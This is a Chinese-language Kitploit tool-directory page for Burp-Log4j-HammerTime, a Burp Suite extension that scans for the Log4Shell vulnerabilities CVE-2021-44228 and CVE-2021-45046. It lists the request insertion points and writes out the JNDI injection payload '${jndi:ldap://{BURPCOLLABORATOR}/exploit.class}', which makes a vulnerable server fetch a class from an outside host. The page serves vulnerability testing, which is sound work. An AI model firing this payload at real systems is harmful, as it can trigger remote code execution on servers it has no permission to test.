Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Burp-Log4j-HammerTime — Burp 主动扫描扩展,用于识别 Log4j 漏洞 CVE-2021-44228 和 CVE-2021-45046 | Kitploit
工具/GitHubGitHub/dxc-strikeforce/burp-log4j-hammertime
漏洞扫描器动态分析 (沙盒)漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubdxc-strikeforce/burp-log4j-hammertime

Burp-Log4j-HammerTime

Burp 主动扫描扩展,用于识别 Log4j 漏洞 CVE-2021-44228 和 CVE-2021-45046

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
84年前尚未审核

Log4j-HammerTime

此 Burp Suite 主动扫描器扩展验证了 Apache Log4j CVE-2021-44228 和 CVE-2021-45046 漏洞的利用。

该扩展使用 Burp Collaborator 来验证问题。

Usage

  • 启用此扩展
  • 在特定目标上启动主动扫描

如果您只想运行此模块中的检查,可以导入 extensions-only.json 配置文件并将其选为主动扫描配置文件。

Details

在主动扫描期间,该扩展尝试以下插入点:

  • HEADER
  • PARAM_NAME_BODY
  • PARAM_BODY
  • PARAM_NAME_URL
  • PARAM_URL
  • PARAM_COOKIE
  • PARAM_JSON
  • ENTIRE_BODY

在每个插入点,请求中注入以下载荷: ${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}

此外,该扩展添加了许多头部,这些头部在 headers(未注释的行)中启用。 这些头部在一次独立的请求中逐一注入。

Legal Disclaimer

本项目仅供教育和道德测试目的。未经事先相互同意而使用 Log4Shell-active-scanner 攻击目标是违法的。最终用户有责任遵守所有适用的地方、州和联邦法律。开发者不承担任何责任,也不对因使用本程序而导致的任何误用或损害负责。

License

本项目采用 MIT 许可证授权。

Authors

  • Freskimo
下载工具